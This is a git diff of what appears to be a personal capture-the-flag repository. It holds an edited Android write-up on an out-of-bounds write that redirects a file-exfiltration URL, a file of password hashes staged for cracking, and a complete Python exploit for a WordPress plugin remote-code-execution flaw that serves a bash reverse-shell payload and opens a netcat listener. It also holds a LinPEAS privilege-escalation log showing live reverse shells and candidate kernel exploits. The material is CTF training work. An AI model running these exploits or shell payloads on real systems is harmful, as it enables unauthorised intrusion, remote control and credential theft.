+RetrieveLog is not in the Java code. It is defined in a separate compiled Binary named `libpeaky.so`. ```java static { System.loadLibrary("peaky"); @@ -126,18 +129,16 @@ static { public native String[] RetrieveLog(String str); ``` -This just turned into a x86_64 reversing challenge! +Using IDA I found out that the Java string that is passed to the function is consumed by `sscanf(callerNameCStr, "%15[^:]:%d:%c", callerTag, &partialOffset, &separatorChar)`. -The function accepts a Java string that acts as a command, reads the last 2048 bytes of a log file to a buffer, and returns a two-element Java String[] array containing a server URL and the log contents. +By examining the callerTag comparisons in the decompiled source, I identified two valid commands: `FULL` and `PARTIAL`. -The command is parsed with `sscanf(callerNameCStr, "%15[^:]:%d:%c", callerTag, &partialOffset, &separatorChar)`. -Because of this a command has the format `"::"`. -There are two commands: `FULL` and `PARTIAL` - -As per my understanding both commands only differ slightly. The `PARTIAL` command writes `separatorChar` at `partialOffset` in the buffer. +Both commands are nearly identical: each opens a file, reads its final 2048 bytes into a buffer, and returns that buffer along with a URL. The URL serves as the target to which the buffer's contents are sent as we have already seen. +The only difference is that the `PARTIAL` command additionally writes `separatorChar` into the buffer at `partialOffset` before returning. This is the logic for writing the separator into the buffer: -``` + +```c if ( *(_QWORD *)callerTag == 'LAITRAP' ) // If PARTIAL set separator { clampedOffset = partialOffset; @@ -156,37 +157,34 @@ if ( *(_QWORD *)callerTag == 'LAITRAP' ) // If PARTIAL set separator g_fileBuffer[separatorPos] = separatorChar; } ``` -The security problem here is that `clampedOffset` and `partialOffset` are both signed integers. -When `clampedOffset` is negative, like `-1`, the subtraction wraps: +The vulnerability lies in the fact that both `clampedOffset` and `partialOffset` are signed integers. The upper bound check `partialOffset >= 2049` correctly rejects values that are too large, but there is no lower bound check. Negative values pass through unconstrained. When `calmpedOffset` is negative the subtraction wraps upwards. ``` 2048 - (-1) = 2049 ``` -`g_fileBuffer[2049]` is the first byte **past** the buffer, which lands exactly on `g_serverUrl[0]`. +`g_fileBuffer[2049]` is one byte **past** the end of the buffer, which lands exactly on `g_serverUrl[0]`. More generally, to write to `g_serverUrl[i]` we need `separatorPos = 2049 + i` -Generalizing: to write to `g_serverUrl[i]` you need `separatorPos = 2049 + i` which means: ``` 2048 - clampedOffset = 2049 + i clampedOffset = -(1 + i) ``` -This allows an attacker to change the URL byte for byte. -Same thing can be done with the logFilePath (here with an offset of `65` and not `1`). +This gives an attacker byte-by-byte control over `g_serverUrl`. The same technique applies to `g_logFilePath`, which sits 65 bytes past the end of the buffer. - -Memory layout in .data: +The relevant memory layout in .data is: ``` g_fileBuffer @ 0x39D8 (2049 bytes, ends at 0x41D8) g_serverUrl @ 0x41D9 (64 bytes) g_logFilePath @ 0x4219 (64 bytes) ``` +By overwriting `g_serverUrl` to an attacker-controlled server and `g_logFilePath` to any file on the device an attacker can read any arbitrary file and exfiltrate data to any URL. -Using this we now have an arbitrary file read. ### Flag location We still need to find the Flag. At this point I remembered that the achievements are loaded on start from a file. +This indicates that the app as some form of context or environment variables. ```java private SharedPreferences prefs; @@ -213,20 +211,21 @@ private void loadProgress() { this.adapter.notifyDataSetChanged(); } ``` + I asked Claude where these SharedPreferences are stored. -It not only told me that the standard path is `/data/data//shared_prefs/.xml` it also said this is a common flag hiding spot for CTFs. +It told me that the standard path is `/data/data//shared_prefs/.xml`. ### Writing the Exploit +This challenge is special to me because we are not given a url with a port by the organizers to attack but a portal where we can upload APKs. As I never wrote an APK before and had no Idea how to handle IPC on Android I generated the following exploit with Claude. It feels a bit filthy but trying to first blood the challenge made me rush. In summary the malicious APK overwrites the webhook URL and the filepath byte per byte and triggers a full read at the end. -To circumvent the `PID == 0` check the sendOnewayTransaction function from above is used. +To circumvent the `PID == 0` check the `sendOnewayTransaction` function from above is used. ```java - package com.hacker.exploit; import android.app.Activity; @@ -243,7 +242,7 @@ import android.util.Log; public class MainActivity extends Activity { private static final String TAG = "Exploit"; private IBinder peakyBinder; - private static final String WEBHOOK_URL = "; + private static final String WEBHOOK_URL = ""; private static final String TARGET = "/data/data/com.peaky.binders/shared_prefs/PeakyPrefs.xml"; private ServiceConnection connection = new ServiceConnection() { @@ -303,3 +302,8 @@ public class MainActivity extends Activity { } ``` + +### Conclusion + +I am happy that the flag was indeed stored at `/data/data/com.peaky.binders/shared_prefs/PeakyPrefs.xml`. At the time I had no further ideas where the flag could be hidden. +This challenge was a lot of fun and showed once again how important it is to use APIs only for their intended purpose especially when they are used to implement a security measure. diff --git a/2026/kalmar/misc/git-hoarder/exploit.sh b/2026/kalmar/misc/git-hoarder/exploit.sh old mode 100644 new mode 100755 index d591cce..14873b8 --- a/2026/kalmar/misc/git-hoarder/exploit.sh +++ b/2026/kalmar/misc/git-hoarder/exploit.sh @@ -27,5 +27,8 @@ git commit -m "Delivery package with refs tracked" # 6. Push to your server git branch -M main -git remote add origin https://gitea.cato447.de/cato447/pwn.git +git remote add origin ssh://git@gitea.cato447.de:222/cato447/pwn.git git push -u origin main -f +cd .. + +rm -rf base_repo malicious.git wrapper diff --git a/2026/usd_hackertag/freya/crack_input b/2026/usd_hackertag/freya/crack_input new file mode 100644 index 0000000..6410024 --- /dev/null +++ b/2026/usd_hackertag/freya/crack_input @@ -0,0 +1,31 @@ +root:$6$mbIzpNIo$XElePqDmVNcUEhdU0nH1eQYvRvU1xQqQOM3F38Zceslqiz0tYTc1iAMxFXTt9TKlXsslPvLoLuMlE/n83iNce/:0:0:root:/root:/bin/bash +daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:*:2:2:bin:/bin:/usr/sbin/nologin +sys:*:3:3:sys:/dev:/usr/sbin/nologin +sync:*:4:65534:sync:/bin:/bin/sync +games:*:5:60:games:/usr/games:/usr/sbin/nologin +man:*:6:12:man:/var/cache/man:/usr/sbin/nologin +lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:*:8:8:mail:/var/mail:/usr/sbin/nologin +news:*:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +proxy:*:13:13:proxy:/bin:/usr/sbin/nologin +www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin +backup:*:34:34:backup:/var/backups:/usr/sbin/nologin +list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false +systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false +systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false +systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false +_apt:*:104:65534::/nonexistent:/bin/false +messagebus:*:105:109::/var/run/dbus:/bin/false +sshd:*:106:65534::/run/sshd:/usr/sbin/nologin +user:$6$RGsJnnEH$mma2lPBOwYMp.3JZ/8dhUW4LZ6Mxee2d52wUiQyxMNOXjzUY5PG.SvfmkriTdHgn5WX7OsBo2AOiPCEEMtTN1.:1000:1000:user,,,:/home/user:/bin/bash +mysql:!:107:111:MySQL Server,,,:/nonexistent:/bin/false +ftp:*:108:112:ftp daemon,,,:/srv/ftp:/bin/false +smmta:*:109:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false +smmsp:*:110:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false +baldur:$6$/ScR4vLK$8XCAkPccvTAycL8fOxZagyk.vy54EqmdTcZQWQI.gzcygN6C5Iy35bMI65TZliwP6acrGpnhRBZKFrexoNGtu/:1001:1001::/home/baldur: diff --git a/2026/usd_hackertag/freya/exploit.py b/2026/usd_hackertag/freya/exploit.py new file mode 100644 index 0000000..a4f0670 --- /dev/null +++ b/2026/usd_hackertag/freya/exploit.py @@ -0,0 +1,105 @@ +#!/usr/bin/env python3 + +# Exploit Title: Social Warfare WordPress Plugin 3.5.2 - Remote Code Execution (RCE) +# Date: 25-06-2025 +# Exploit Author: Huseyin Mardini (@housma) +# Original Researcher: Luka Sikic +# Original Exploit Author: hash3liZer +# Vendor Homepage: https://wordpress.org/plugins/social-warfare/ +# Software Link: https://downloads.wordpress.org/plugin/social-warfare.3.5.2.zip +# Version: <= 3.5.2 +# CVE: CVE-2019-9978 +# Tested On: WordPress 5.1.1 with Social Warfare 3.5.2 (on Ubuntu 20.04) +# Python Version: Python 3.x +# Reference: https://www.exploit-db.com/exploits/46794 +# Github (original PoC): https://github.com/hash3liZer/CVE-2019-9978 + +# The currently listed exploit for *CVE-2019-9978* (Exploit ID 46794) appears to no longer work as intended in many modern environments + +# Usage: +# 1. Edit the config section below and replace `ATTACKER_IP` with your machine's IP. +# 2. Run the script: `python3 exploit.py` +# 3. It will: +# - Create a PHP payload and save it as `payload.txt` (or any filename you set in PAYLOAD_FILE) +# - Start an HTTP server on `HTTP_PORT` to host the payload +# - Start a Netcat listener on `LISTEN_PORT` +# - Trigger the vulnerability via the vulnerable `swp_debug` parameter +# 4. On success, you get a reverse shell as `www-data`. +# +# Note: +# - PAYLOAD_FILE defines only the name of the file to be created and served. +# - Make sure ports 8001 and 4444 are open and not in use. + +import requests +import threading +import http.server +import socketserver +import os +import subprocess +import time +import random + +# --- Config --- +TARGET_URL = "http://10.2.66.5/yggdrasil" +ATTACKER_IP = "10.1.0.172" # Change to your attack box IP +HTTP_PORT = 80 +LISTEN_PORT = random.randint(40000,65555) +PAYLOAD_FILE = "payload.txt" + + +def create_payload(): + """Write exact reverse shell payload using valid PHP syntax""" + payload = f'

system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")
' + with open(PAYLOAD_FILE, "w") as f: + f.write(payload) + print(f"[+] Payload written to {PAYLOAD_FILE}") + + +def start_http_server(): + """Serve payload over HTTP""" + handler = http.server.SimpleHTTPRequestHandler + with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd: + print(f"[+] HTTP server running at port {HTTP_PORT}") + httpd.serve_forever() + + +def start_listener(): + """Start Netcat listener""" + print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...") + subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)]) + + +def send_exploit(): + """Trigger the exploit with vulnerable parameter""" + payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}" + exploit = f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}" + print(f"[+] Sending exploit: {exploit}") + try: + requests.get(exploit, timeout=5) + except requests.exceptions.RequestException: + pass + + +def main(): + create_payload() + + # Start web server in background + http_thread = threading.Thread(target=start_http_server, daemon=True) + http_thread.start() + time.sleep(2) # Give server time to start + + # Start listener in background + listener_thread = threading.Thread(target=start_listener) + listener_thread.start() + time.sleep(1) + + # Send the malicious request + send_exploit() + + +if __name__ == "__main__": + try: + main() + except KeyboardInterrupt: + print("[-] Interrupted by user.") + diff --git a/2026/usd_hackertag/freya/out.txt b/2026/usd_hackertag/freya/out.txt new file mode 100644 index 0000000..5383daa --- /dev/null +++ b/2026/usd_hackertag/freya/out.txt @@ -0,0 +1,2083 @@ + + + + ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ + ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄ + ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄ + ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ + ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ + ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ + ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄ + ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄  + ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄ + ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄ + ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄ + ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ + ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄ + ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄ + ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄ + ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄ + ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄  +  ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  + ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ + ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ + ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ + ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀ + ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀ + ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀ + + /---------------------------------------------------------------------------------\ + | Do you like PEASS? | + |---------------------------------------------------------------------------------| + | Linux PE & Hardening : https://hacktricks-training.com/courses/lhe/ | + | Learn Cloud Hacking : https://training.hacktricks.xyz  | + | Follow on Twitter : @hacktricks_live | + | Respect on HTB : SirBroccoli  | + |---------------------------------------------------------------------------------| + | Thank you!  | + \---------------------------------------------------------------------------------/ + LinPEAS-ng by carlospolop + +ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission. + +Linux Privesc Checklist: https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html +Best Linux PE & Hardening course: https://hacktricks-training.com/courses/lhe/ + LEGEND: + RED/YELLOW: 95% a PE vector + RED: You should take a look into it + LightCyan: Users with console + Blue: Users without console & mounted devs + Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) + LightMagenta: Your username + + Starting LinPEAS. Caching Writable Folders... + ╔═══════════════════╗ +═══════════════════════════════╣ Basic information ╠═══════════════════════════════ + ╚═══════════════════╝ +OS: Linux version 4.9.0-13-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.228-1 (2020-07-05) +User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data) +Hostname: Freya + +[+] /bin/ping is available for network discovery (LinPEAS can discover hosts, learn more with -h) +[+] /bin/bash is available for network discovery, port scanning and port forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h) +[+] /bin/nc is available for network discovery & port scanning (LinPEAS can discover hosts and scan ports, learn more with -h) + + +Caching directories DONE + + ╔════════════════════╗ +══════════════════════════════╣ System Information ╠══════════════════════════════ + ╚════════════════════╝ +╔══════════╣ Operative system (T1082) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits +Linux version 4.9.0-13-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.228-1 (2020-07-05) +Distributor ID: Debian +Description: Debian GNU/Linux 9.13 (stretch) +Release: 9.13 +Codename: stretch + +╔══════════╣ Sudo version (T1548.003,T1068) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version +Sudo version 1.8.19p1 + + +╔══════════╣ PATH (T1574.007) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses +/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin + +╔══════════╣ Date & uptime (T1082) +Fri May 8 15:31:42 CEST 2026 + 15:31:42 up 2:02, 0 users, load average: 0.31, 0.07, 0.02 + +╔══════════╣ Unmounted file-system? (T1082,T1120) +╚ Check if you can mount umounted devices +UUID=f7a6612b-4beb-4d99-8e1c-e21ce24de256 / ext4 errors=remount-ro 0 1 +UUID=7ba27db0-d440-4124-afa4-b92fb256e21d none swap sw 0 0 +/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0 + +╔══════════╣ Any sd*/disk* disk in /dev? (limit 20) (T1082) +disk +sda +sda1 +sda2 +sda5 + +╔══════════╣ Environment (T1082,T1552.007) +╚ Any private information inside environment variables? +APACHE_LOG_DIR=/var/log/apache2 +LANG=C +OLDPWD=/home +APACHE_LOCK_DIR=/var/lock/apache2 +PWD=/tmp +APACHE_RUN_GROUP=www-data +APACHE_RUN_DIR=/var/run/apache2 +APACHE_RUN_USER=www-data +APACHE_PID_FILE=/var/run/apache2/apache2.pid +SHLVL=3 +LANGUAGE=en_US:en +_=/usr/bin/env + +╔══════════╣ Searching Signature verification failed in dmesg (T1082) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed +dmesg Not Found + +╔══════════╣ Protections (T1518.001) +═╣ AppArmor enabled? .............. /etc/apparmor.d +═╣ AppArmor profile? .............. unconfined +═╣ is linuxONE? ................... s390x Not Found +═╣ grsecurity present? ............ grsecurity Not Found +═╣ PaX bins present? .............. PaX Not Found +═╣ Execshield enabled? ............ Execshield Not Found +═╣ SELinux enabled? ............... sestatus Not Found +═╣ Seccomp enabled? ............... disabled +═╣ User namespace? ................ enabled +═╣ unpriv_userns_clone? ........... 0 +═╣ unpriv_bpf_disabled? ........... 0 +═╣ Cgroup2 enabled? ............... enabled +═╣ kptr_restrict? ................. 0 +═╣ dmesg_restrict? ................ 1 +═╣ ptrace_scope? .................. 0 +═╣ protected_symlinks? ............ /proc/sys/fs/protected_symlinks Not Found +═╣ protected_hardlinks? ........... /proc/sys/fs/protected_hardlinks Not Found +═╣ perf_event_paranoid? ........... 3 +═╣ mmap_min_addr? ................. 65536 +═╣ lockdown mode? ................. /sys/kernel/security/lockdown Not Found +═╣ Kernel hardening flags? ........ CONFIG_SLAB_FREELIST_RANDOM=y +CONFIG_RANDOMIZE_BASE=y +# CONFIG_KASAN is not set +═╣ Is ASLR enabled? ............... Yes +═╣ Printer? ....................... No +═╣ Is this a virtual machine? ..... Yes (qemu) + +╔══════════╣ Kernel Modules Information (T1547.006) +══╣ Kernel modules with weak perms? (T1547.006) + +══╣ Kernel modules loadable? (T1547.006) +Modules can be loaded +══╣ Module signature enforcement? (T1547.006) +Not enforced + +╔══════════╣ Checking for Copy Fail (CVE-2026-31431) (T1068) +╚ https://copy.fail/ +╚ https://www.cve.org/CVERecord?id=CVE-2026-31431 +NOT VULNERABLE: AF_ALG/authencesn is not reachable from this context (getsockaddrarg: bad family) + +╔══════════╣ Kernel Exploit Registry (T1068) +═╣ Operating system ............. Linux +═╣ Kernel release ............... 4.9.0-13-amd64 +═╣ Comparable version ........... 4.9.0.13 +═╣ Data chunk limit ............. max 25 rows per KERNEL_CVE_DATA_* variable (1..21) +═╣ Kernel config source ......... /boot/config-4.9.0-13-amd64 +CVE: CVE-2017-16995 | Name: eBPF_verifier | Match data: pkg=linux-kernel,ver>=4.4,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1 | Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic} | Rank: 5 | Details: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1 +CVE: CVE-2017-1000253 | Name: PIE_stack_corruption | Match data: pkg=linux-kernel,ver>=3.2,ver<=4.13,x86_64 | Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1} | Rank: 1 +CVE: CVE-2019-13272 | Name: PTRACE_TRACEME | Match data: pkg=linux-kernel,ver>=4,ver<5.1.17,sysctl:kernel.yama.ptrace_scope==0,x86_64 | Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*} | Rank: 1 | Details: Requires an active PolKit agent. +CVE: CVE-2021-27365 | Name: linux-iscsi | Match data: pkg=linux-kernel,ver<=5.11.3,CONFIG_SLAB_FREELIST_HARDENED!=y | Tags: RHEL=8 | Rank: 1 | Details: CONFIG_SLAB_FREELIST_HARDENED must not be enabled +CVE: CVE-2021-3493 | Name: Ubuntu OverlayFS | Match data: pkg=linux-kernel,ver>=3.13,ver<5.14,x86_64 | Tags: ubuntu=(14.04|16.04|18.04|20.04|20.10) | Rank: 1 | Details: Only Ubuntu is affected. +CVE: CVE-2021-22555 | Name: Netfilter heap out-of-bounds write | Match data: pkg=linux-kernel,ver>=2.6.19,ver<=5.12-rc6 | Tags: ubuntu=20.04{kernel:5.8.0-*} | Rank: 1 | Details: ip_tables kernel module must be loaded +═╣ Kernel vulns found: 6 + + + + ╔═══════════╗ +═══════════════════════════════════╣ Container ╠═══════════════════════════════════ + ╚═══════════╝ +╔══════════╣ Container related tools present (if any): (T1613) +/usr/bin/nsenter +/usr/bin/unshare +/usr/sbin/chroot + +╔══════════╣ Container details (T1613,T1611) +═╣ Is this a container? ........... No +═╣ Interesting runtime sockets ... ═╣ Any running containers? ........ No + + + + ╔═══════╗ +═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════ + ╚═══════╝ +Learn and practice cloud hacking techniques in https://training.hacktricks.xyz + +═╣ GCP Virtual Machine? ................. No +═╣ GCP Cloud Funtion? ................... No +═╣ AWS ECS? ............................. No +═╣ AWS EC2? ............................. No +═╣ AWS EC2 Beanstalk? ................... No +═╣ AWS Lambda? .......................... No +═╣ AWS Codebuild? ....................... No +═╣ DO Droplet? .......................... No +═╣ IBM Cloud VM? ........................ No +═╣ Azure VM or Az metadata? ............. No +═╣ Azure APP or IDENTITY_ENDPOINT? ...... No +═╣ Azure Automation Account? ............ No +═╣ Aliyun ECS? .......................... No +═╣ Tencent CVM? ......................... No + + + + ╔════════════════════════════════════════════════╗ +════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════ + ╚════════════════════════════════════════════════╝ +╔══════════╣ Running processes (cleaned) (T1057) +╚ Check weird & unexpected processes run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes +root 1 0.0 0.6 138908 6700 ? Ss 13:29 0:01 /sbin/init +root 427 0.0 0.5 56852 5324 ? Ss 13:29 0:01 /lib/systemd/systemd-journald +root 461 0.0 0.3 45932 4028 ? Ss 13:29 0:00 /lib/systemd/systemd-udevd +systemd+ 474 0.0 0.3 127288 4060 ? Ssl 13:29 0:00 /lib/systemd/systemd-timesyncd +root 625 0.0 0.2 29664 2900 ? Ss 13:29 0:00 /usr/sbin/cron -f +root 2619 0.0 0.2 48824 2760 ? S 15:29 0:00 _ /usr/sbin/CRON -f +root 2632 0.0 0.2 48824 2760 ? S 15:30 0:00 _ /usr/sbin/CRON -f +root 2637 0.0 0.5 62292 6064 ? S 15:30 0:00 | _ /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root +root 2642 0.0 0.2 48824 2760 ? S 15:31 0:00 _ /usr/sbin/CRON -f +root 2647 0.0 0.6 62296 6236 ? S 15:31 0:00 | _ /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root +root 18230 0.0 0.2 48824 2760 ? S 15:32 0:00 _ /usr/sbin/CRON -f +root 18235 0.0 0.6 62296 6416 ? S 15:32 0:00 _ /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root +message+ 630 0.0 0.3 45128 3784 ? Ss 13:29 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation +root 652 0.0 0.3 250112 3092 ? Ssl 13:29 0:00 /usr/sbin/rsyslogd -n +root 654 0.0 0.4 46476 4548 ? Ss 13:29 0:00 /lib/systemd/systemd-logind +root 659 0.0 0.2 28456 2904 ? Ss 13:29 0:00 /usr/sbin/vsftpd /etc/vsftpd.conf +root 674 0.0 0.1 14524 1660 tty1 Ss+ 13:29 0:00 /sbin/agetty --noclear tty1 linux +root 689 0.0 0.1 20360 1040 ? Ss 13:29 0:00 /sbin/dhclient -4 -v -pf /run/dhclient.ens18.pid -lf /var/lib/dhcp/dhclient.ens18.leases -I -df /var/lib/dhcp/dhclient6.ens18.leases ens18 +root 736 0.0 0.5 69960 6020 ? Ss 13:29 0:00 /usr/sbin/sshd -D +root 740 0.0 0.5 69960 5220 ? Ss 13:29 0:00 /usr/sbin/sshd -D -f /etc/ssh/mgmtsshd_config +mysql 883 0.1 7.9 670640 81132 ? Ssl 13:29 0:07 /usr/sbin/mysqld +root 952 0.1 0.2 22516 2640 ? Ss 13:29 0:07 /usr/sbin/qemu-ga --daemon[0mize -m virtio-serial -p /dev/virtio-ports/org.qemu.guest_agent.0 +root 1022 0.0 2.6 302668 26864 ? Ss 13:29 0:00 /usr/sbin/apache2 -k start +www-data 1053 0.0 2.4 303320 25148 ? S 13:29 0:00 _ /usr/sbin/apache2 -k start +www-data 1054 0.0 2.3 305352 23872 ? S 13:29 0:00 _ /usr/sbin/apache2 -k start +www-data 2363 0.0 0.0 4276 696 ? S 15:08 0:00 | _ sh -c bash -c "bash -i >& /dev/tcp/10.1.0.172/4444 0>&1" +www-data 2364 0.0 0.2 17940 2764 ? S 15:08 0:00 | _ bash -c bash -i >& /dev/tcp/10.1.0.172/4444 0>&1 +www-data 2365 0.0 0.3 18164 3172 ? S 15:08 0:00 | _ bash -i +www-data 2486 0.0 0.1 16184 1168 ? S 15:14 0:00 | _ ping 8.8.8.8 +www-data 1055 0.0 2.5 303324 25916 ? S 13:29 0:00 _ /usr/sbin/apache2 -k start +www-data 1056 0.0 3.1 307528 31972 ? S 13:29 0:00 _ /usr/sbin/apache2 -k start +www-data 1057 0.0 3.1 305992 31716 ? S 13:29 0:00 _ /usr/sbin/apache2 -k start +www-data 2626 0.0 0.0 4276 736 ? S 15:29 0:00 | _ sh -c bash -c "bash -i >& /dev/tcp/10.1.0.172/4444 0>&1" +www-data 2627 0.0 0.2 17940 2728 ? S 15:29 0:00 | _ bash -c bash -i >& /dev/tcp/10.1.0.172/4444 0>&1 +www-data 2628 0.0 0.3 18164 3172 ? S 15:29 0:00 | _ bash -i +www-data 2649 5.4 0.5 21000 5792 ? S 15:31 0:02 | _ bash linpeas.sh +www-data 18313 0.0 0.4 21000 4616 ? S 15:32 0:00 | | _ bash linpeas.sh +www-data 18317 0.0 0.2 36772 2944 ? R 15:32 0:00 | | | _ ps fauxwww +www-data 18316 0.0 0.3 21000 3216 ? S 15:32 0:00 | | _ bash linpeas.sh +www-data 2650 0.0 0.0 4188 704 ? S 15:31 0:00 | _ tee out.txt +www-data 1955 0.0 0.9 302756 9564 ? S 14:36 0:00 _ /usr/sbin/apache2 -k start +www-data 1958 0.0 3.4 307812 34700 ? S 14:36 0:00 _ /usr/sbin/apache2 -k start +www-data 1959 0.0 3.3 306112 33732 ? S 14:36 0:00 _ /usr/sbin/apache2 -k start +www-data 1960 0.0 3.0 307428 30936 ? S 14:36 0:00 _ /usr/sbin/apache2 -k start +www-data 2494 0.0 0.0 4276 744 ? S 15:15 0:00 | _ sh -c bash -c "bash -i >& /dev/tcp/10.1.0.172/4444 0>&1" +www-data 2495 0.0 0.2 17940 2760 ? S 15:15 0:00 | _ bash -c bash -i >& /dev/tcp/10.1.0.172/4444 0>&1 +www-data 2496 0.0 0.3 18164 3172 ? S 15:15 0:00 | _ bash -i +www-data 2506 0.0 0.1 16184 1120 ? S 15:16 0:00 | _ ping 8.8.8.8 +www-data 1961 0.0 3.4 308160 34732 ? S 14:36 0:00 _ /usr/sbin/apache2 -k start +root 1250 0.0 0.5 81876 5204 ? Ss 13:33 0:00 sendmail: MTA: accepting connections + +╔══════════╣ Processes with unusual configurations (T1057) + +╔══════════╣ Processes with credentials in memory (root req) (T1003.007) +╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory +gdm-password Not Found +gnome-keyring-daemon Not Found +lightdm Not Found +vsftpd process found (dump creds from memory as root) +apache2 process found (dump creds from memory as root) +sshd: Not Found +mysql process found (dump creds from memory as root) +postgres Not Found +redis-server Not Found +mongod Not Found +memcached Not Found +elasticsearch Not Found +jenkins Not Found +tomcat Not Found +nginx Not Found +php-fpm Not Found +supervisord Not Found +vncserver Not Found +xrdp Not Found +teamviewer Not Found + +╔══════════╣ Opened Files by processes (T1003.007) +Process 